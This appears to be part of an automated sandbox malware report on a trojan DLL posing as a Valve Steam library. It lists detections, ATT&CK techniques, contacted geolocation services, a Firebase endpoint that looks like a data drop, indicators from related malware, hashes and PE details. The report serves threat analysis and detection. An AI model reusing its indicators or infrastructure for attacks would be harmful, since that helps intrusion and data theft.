                        Source: Yara matchFile source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6200, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7120, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2496, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                        DLL Side-Loading                        		112
                        Process Injection                        		11
                        Masquerading                        		1
                        Input Capture                        		1
                        Process Discovery                        		Remote Services1
                        Input Capture                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		LSASS Memory21
                        Virtualization/Sandbox Evasion                        		Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
                        Virtualization/Sandbox Evasion                        		Security Account Manager1
                        Application Window Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
                        Process Injection                        		NTDS1
                        System Network Configuration Discovery                        		Distributed Component Object ModelInput Capture14
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Obfuscated Files or Information                        		LSA Secrets12
                        System Information Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Rundll32                        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        vstdlib_s64.dll.dll26%ReversingLabsByteCode-MSIL.Trojan.Zilla
                        vstdlib_s64.dll.dll100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://telize.com/geoip0%Avira URL Cloudsafe
                        http://api.ipify.org/0%Avira URL Cloudsafe
                        http://freegeoip.net/xml/0%Avira URL Cloudsafe
                        https://argentina-e4162-default-rtdb.firebaseio.com/user.json0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        telize.com
                        		88.198.193.213
                        		truetrue
                          		unknown
                          api.ipify.org
                          		104.26.13.205
                          		truetrue
                            		unknown
                            freegeoip.net
                            		3.33.130.190
                            		truetrue
                              		unknown
                              argentina-e4162-default-rtdb.firebaseio.com
                              		35.201.97.85
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://api.ipify.org/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://freegeoip.net/xml/true
                                • Avira URL Cloud: safe
                                		unknown
                                https://argentina-e4162-default-rtdb.firebaseio.com/user.jsonfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://telize.com/geoiptrue
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                35.201.97.85
                                		argentina-e4162-default-rtdb.firebaseio.comUnited States
                                		15169GOOGLEUSfalse
                                88.198.193.213
                                		telize.comGermany
                                		24940HETZNER-ASDEtrue
                                104.26.13.205
                                		api.ipify.orgUnited States
                                		13335CLOUDFLARENETUStrue
                                3.33.130.190
                                		freegeoip.netUnited States
                                		8987AMAZONEXPANSIONGBtrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1473780
                                Start date and time:2024-07-15 21:06:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 10m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:25
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:vstdlib_s64.dll.dll
                                (renamed file extension from exe to dll)
                                Original Sample Name:vstdlib_s64.dll.exe
                                Detection:MAL
                                Classification:mal80.troj.spyw.evad.winDLL@38/2@4/4
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: vstdlib_s64.dll.dll

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:07:10API Interceptor1x Sleep call for process: loaddll64.exe modified
                                15:07:18API Interceptor1535718x Sleep call for process: rundll32.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                88.198.193.2136OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • telize.com/geoip
                                K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                • telize.com/geoip
                                30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                • telize.com/geoip
                                XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                • www.telize.com/geoip
                                svchost.exeGet hashmaliciousQuasarBrowse
                                • www.telize.com/geoip
                                conn.exeGet hashmaliciousQuasarBrowse
                                • www.telize.com/geoip
                                104.26.13.205golang-modules.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                • api.ipify.org/?format=wef
                                Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                • api.ipify.org/
                                ld.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                • api.ipify.org/
                                ReturnLegend.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                • api.ipify.org/
                                Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/?format=json
                                3.33.130.190New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • www.mscuration.com/txr6/
                                ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                • www.shapenbuy.com/5xz5/
                                BL.exeGet hashmaliciousFormBookBrowse
                                • www.abc8web.com/sm5e/
                                OrderPI.exeGet hashmaliciousFormBookBrowse
                                • www.lextcommunities.com/qt3s/
                                docs_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx
                                payment advice.exeGet hashmaliciousFormBookBrowse
                                • www.abc8web.com/sm5e/
                                vNrcPvMYLZmn2cc.exeGet hashmaliciousFormBookBrowse
                                • www.zerolength.xyz/mc10/?yrCDSlw=+hw+aGSrqNJPXAKTI+d1f9+ihmayTPYKE17mK9H9odLh7YQ+aA2Ta0l7fr2FH5vYxut0&Jlt=Y4Ctjz3PDNY8yDR
                                MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                                • www.abc8web.com/sm5e/
                                3O0zPitVnR82n5Y.exeGet hashmaliciousFormBookBrowse
                                • www.fundraiserstuffies.com/sm5u/
                                rNuevalistadepedidos.exeGet hashmaliciousFormBookBrowse
                                • www.anavamarketing.com/iat1/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                telize.com6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                • 88.198.193.213
                                30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                svchost.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                conn.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                freegeoip.net6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 15.197.148.33
                                Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                • 15.197.148.33
                                z4XlS0wTQM.exeGet hashmaliciousQuasarBrowse
                                • 15.197.148.33
                                Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                • 3.33.130.190
                                K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                • 172.67.75.176
                                Commission_Dec23_Exec_Approval.xlsx.jsGet hashmaliciousBlackshadesBrowse
                                • 104.26.15.73
                                30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                • 104.26.15.73
                                XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                • 104.26.15.73
                                Outstanding Secured Credit Invoices.pdf.exeGet hashmaliciousBlackshadesBrowse
                                • 172.67.75.176
                                Invoice.exeGet hashmaliciousBlackshadesBrowse
                                • 104.26.14.73
                                api.ipify.org6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 104.26.12.205
                                Zam#U00f3wienie - #20240715-A09461_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                0001.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                Great Lake - Quote#474701.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                Josephine Lawrence items.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                • 172.67.74.152
                                Hhf5a5ATds.exeGet hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                Hhf5a5ATds.exeGet hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                https://pttgov-gw.top/help/Get hashmaliciousUnknownBrowse
                                • 104.26.13.205

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUS6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 104.26.12.205
                                https://34.75.2o2.lol/XVjBTRlVwbW40SnF4OXJSYmJkbVUxSkdPT2cwQWJtMTRNNVA3VDN5UVRVaUlHR0pmdmZZd1Q5dUp0RUlwY0pPVGpKcUR3bXhYODB1NWtVTUk3RjdGUnJ6YnhHeG1TOXE0Z1MwUVhKRndKN1N5UVJPS3V1L1NycmpzdFJHQWRKbndEbVg4ODMzNE1nQ2hiazFtQmR3VEZJeHYyWXAycTEzUEZMODFqTGxmdjd2SDlNQVhHeFAzYU5XMy0td2Y2dStNQ0JBZHl6a1JJVi0tbS82L0xUaU04RU1Qc2dWdldWbm02QT09?cid=2117374656Get hashmaliciousUnknownBrowse
                                • 104.16.117.116
                                https://cloud-drive.services/i/a5b210032126e461fbaa7518681a0ce06Get hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.96.3
                                https://fyui.short.gy/Pu658cGet hashmaliciousUnknownBrowse
                                • 172.64.155.119
                                http://links.888brands.net/ctt?m=34615482&r=LTg2NDEzNjA1MDIS1&b=0&j=MjUyMjI0NDU0OAS2&mt=1&kt=12&kx=1&k=888-external-en_custhelp_com_a&kd=//cvgmilano.com/img/#tokyo1@tira.co.jpGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                • 104.17.25.14
                                Complete with Docusign dmoore@nsedc.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                • 104.17.2.184
                                https://tinyurl.com/2kfd9dv5%7CnetworkConnections_direction_1Get hashmaliciousUnknownBrowse
                                • 104.17.3.184
                                Reference ID6f5f047b6cdf41716e164ec64879e463.emlGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                https://www.axians-ewaste.com/faq/anleitung-installation-signatursoftware/Get hashmaliciousUnknownBrowse
                                • 104.17.25.14
                                AMAZONEXPANSIONGBhttp://24usred.com/0kqZRSGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://skmadvocates.co.ke/dGt/bm9BkNQTsUBoAHHVY36CsnStq75FyBQg8CeZJT4xRH2NEhgsnPSR8gtKpSjbvPtdZbrTnuyG33FV5tDBJraTiqCTpLfzVJSeqV8cEPCNLNV42udbNRkGNUXivyFTVq9xo6Get hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
                                http://itumbrellagroup.comGet hashmaliciousUnknownBrowse
                                • 52.223.39.232
                                New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 3.33.130.190
                                ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                • 3.33.244.179
                                https://mettamasklogiinf.gitbook.io/us/Get hashmaliciousUnknownBrowse
                                • 3.33.235.18
                                DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                • 3.33.244.179
                                http://service-public-finances.com/Get hashmaliciousPhisherBrowse
                                • 52.223.40.198
                                http://api-connects.pages.dev/wallet.html,api-connects.pages.dev,172.66.46.230Get hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://uspsdirect.one?t=guoiGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                HETZNER-ASDE6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                http://www.nicetours.netGet hashmaliciousUnknownBrowse
                                • 46.4.249.94
                                http://4allpromo.com/Get hashmaliciousUnknownBrowse
                                • 136.243.44.113
                                c32420d2-f683-f305-71f5-f5966fa0459d.emlGet hashmaliciousHTMLPhisherBrowse
                                • 95.217.66.83
                                https://trk.klclick3.com/ls/click?upn=u001.I9LhpOxgCcXrD8xJgdEO8WUi5tV6wurQhjXRfDAEMS-2FcMa0g0FTnahsI5IEFHinKC-2FGj8kpAqnaoI6Qoa3vFLySKKSAfv0Wxu2Dy-2BRyMntsvwfzFfHILPHPRV90LmePFgMglDqCtK67PLGfWxTEMO93TwkvZZtNoI477LbXPoBjcrwXEgXl1dr5-2Bsbz8VZiUNXN768BEIA-2BYnNr4FIu9nA-3D-3DATse_RSmWOI3fPdFDxAydigDPQ0uJwuQ-2FUs3Wu1xZT2pFOHtvwUa8-2Ftks3ld44BID-2BJgD3ps4M8U7HlIP10yVJ6ZeFvrA3iSG0rco-2Fzt7OL4FXId6TCwVFcQcW-2F2E-2Faa3q7Weo2xYvFD1h9l7jEVdzkUp4Kp77hFD1XYDRoeiAzaz-2BFA4Srg7EiFD-2BO6F2w7c4O0pEK7boN40RNA-2F8TusPddYFOH48pk30jzUw7CYeSygfO9hZkczhRjxavPfa15ZQShZu24zwPQtiM5rYtaL0zKZeMvKbYsdrel3rTSJBLKXR2MMcVfiOQJo1JHVPclcvULrA5xewzIBFupBKpLaDZv1KWbZjd-2F-2BEE4MzV1Vme-2FCaJxOXBca4gsTghUHHiiDIxlLzjYnWoXwKNHeSslKR-2BUfUjOwwSmF8fN79-2FzJVuaw4lasmT9EvZxZK-2BAH7JlY5rrgFg8Woxh0SAeruKYO5LevAgBmW3c5sr-2F85S8FCROz5cY3UDqnpYtBxr1o9XTEZg-2FV#/kLIB1/evbLziA5E-SUREIDAN1VmLjN2YAtWauRWdi5SYsxWatF2aGet hashmaliciousHTMLPhisherBrowse
                                • 95.217.66.83
                                o82ktPixLt.exeGet hashmaliciousRedLineBrowse
                                • 95.217.245.123
                                gQzJjvCHZV.exeGet hashmaliciousRedLineBrowse
                                • 95.217.245.123
                                DCAbo3D46k.exeGet hashmaliciousRedLineBrowse
                                • 95.217.245.123
                                wkvH2q7DNh.exeGet hashmaliciousRedLineBrowse
                                • 95.217.245.123
                                PvJy3zSayP.exeGet hashmaliciousUnknownBrowse
                                • 78.47.201.39

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                54328bd36c14bd82ddaa0c04b25ed9ad6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 35.201.97.85
                                855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                • 35.201.97.85
                                rDoc_87993766478.exeGet hashmaliciousLokibotBrowse
                                • 35.201.97.85
                                rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 35.201.97.85
                                rTNT__consignmentnumber__87993766478.exeGet hashmaliciousLokibotBrowse
                                • 35.201.97.85
                                NewOrder_LCL240887.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 35.201.97.85
                                FVG2-20240704.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 35.201.97.85
                                SecuriteInfo.com.Win64.PWSX-gen.3492.24691.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 35.201.97.85
                                #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                • 35.201.97.85
                                DHL Waybill & Shipping Document.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 35.201.97.85

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log

                                Download File
                                Process:C:\Windows\System32\rundll32.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):42
                                Entropy (8bit):4.0050635535766075
                                Encrypted:false
                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                C:\Windows\System32\Data.log

                                Download File
                                Process:C:\Windows\System32\rundll32.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.7219280948873625
                                Encrypted:false
                                SSDEEP:3:Jw/zn:Szn
                                MD5:A727C23FB0D2ED884F90288656DE1378
                                SHA1:7BDF93C8575CA64B179D7316531BFF47F2D06768
                                SHA-256:58F2795D1156D90EC8057C218D5E53E54A21FE92AF2414D516C5A77B363FDA6B
                                SHA-512:B2732256B5675E00960DF616CB78D723D886CB0E11C181EB7650CDE30BAE251732EE56F93132A1282DBBD2EF3662674540AFAC08EC98BEB8FBBAF3A5DDD56A28
                                Malicious:false
                                Preview:15:07:2024

                                Static File Info

                                General

                                File type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):4.1366584226365735
                                TrID:
                                • Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                                • Win64 Dynamic Link Library (generic) (102004/3) 40.63%
                                • Win64 Executable (generic) Net Framework (21505/4) 8.57%
                                • Win64 Executable (generic) (12005/4) 4.78%
                                • Generic Win/DOS Executable (2004/3) 0.80%
                                File name:vstdlib_s64.dll.dll
                                File size:7'477'096 bytes
                                MD5:ac7da10e20d625cc463536172d0ac33e
                                SHA1:c4242194e3faa82506513e2572c160a30082bfb0
                                SHA256:6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
                                SHA512:77f929fa05266793765014b24fede5f0c64f88598f9580a6aaa4d339b428e4a68eacdb4dc0cab1f1c428f870c57ac54e55423f8fbbe80fd1a48ac54442f1787a
                                SSDEEP:24576:KxClp92/e9DlZ62nbFSu28jugkg91tVWwS+pvbOOmwWYhssXfKySQN1jk1eI8ykJ:h0bz0nbb
                                TLSH:8976324CE43A95D8CD4672F0AC96198C39855DD89FBD572A042CC0B827EB6BC42877FE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f.f.........." ......q.........f.q.. ........... .......................`r...........@...@......@............... .....

                                File Icon

                                Icon Hash:7ae282899bbab082

                                Static PE Info

                                General

                                Entrypoint:0x18071fd66
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x180000000
                                Subsystem:windows cui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6685668E [Wed Jul 3 14:56:14 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:dae02f32a21e03ce65412f6e56942daa

                                Authenticode Signature

                                Signature Valid:false
                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 07/10/2021 01:00:00 10/10/2024 00:59:59
                                Subject Chain
                                • CN=Valve Corp., O=Valve Corp., L=Bellevue, S=Washington, C=US
                                Version:3
                                Thumbprint MD5:83896ECC20DB9E84A1A1D6D5B5B15A5D
                                Thumbprint SHA-1:935767D66FAD4AD2D1F03A095C49370DC74DF607
                                Thumbprint SHA-256:E98CCA8343960798A47BDB3CDD319DB4B9C6DBD8BC7574C13F6C09A925AEC0E9
                                Serial:0689B3BCEB4409890A32D71976B132A4

                                Entrypoint Preview

                                Instruction
                                dec eax
                                mov eax, dword ptr [80002000h]
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                jmp eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

